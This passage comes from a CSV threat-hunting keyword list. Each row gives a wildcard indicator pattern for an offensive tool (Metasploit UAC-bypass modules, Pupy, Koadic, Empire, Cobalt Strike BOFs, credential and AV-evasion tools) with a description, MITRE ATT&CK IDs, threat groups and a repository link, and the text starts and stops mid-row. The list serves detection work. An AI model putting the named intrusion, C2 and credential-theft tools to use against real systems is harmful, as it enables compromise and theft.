identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection_winsxs.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_registry.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*bypassuac_sdclt*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_silentcleanup.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_slui*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_sluihijack.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_systempropertiesadvanced*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_token_imp.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*bypassuac_vbs.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_windows_store_reg.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_wsreset*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*BypassUACTokenManipulation*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bypassuac-x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x64.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x86.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypasswaf.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*bypasswaf.jar*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*bypasswaf.py*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*byt3bl33d3r*,offensive_tool_keyword,Github Username,malware and offensive tools developper ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/byt3bl33d3r,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*byt3bl33d3r/BOF-Nim*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*byt3bl33d3r/DeathStar*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*byt3bl33d3r/gcat*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*byt3bl33d3r/ItWasAllADream*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*byt3bl33d3r/pth-toolkit*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*byt3bl33d3r/SpamChannel*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*-c /tmp/redsocks.conf*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*-c 854A20FB-2D44-457D-992F-EF13785D2B51*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*-c BOF.cpp -o BOF.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*-c BOF.cpp -o BOF.x64.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*-c credentialmanager.c -o credentialmanager.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c modifiableautorun.c -o modifiableautorun.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c tokenprivileges.c -o tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c unquotedsvcpath.c -o unquotedsvcpath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by 
misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*C&C => *,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*c:/users/public/creds.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*C:\aab.txt*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*c:\agent.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*C:\dsc_hello.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*C:\ProgramData\Prefetch\na.exe*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - 
T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*C:\ProgramData\SystemData\microsoft_Windows.dll*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*C:\Temp\file.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*C:\Temp\poc.txt*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
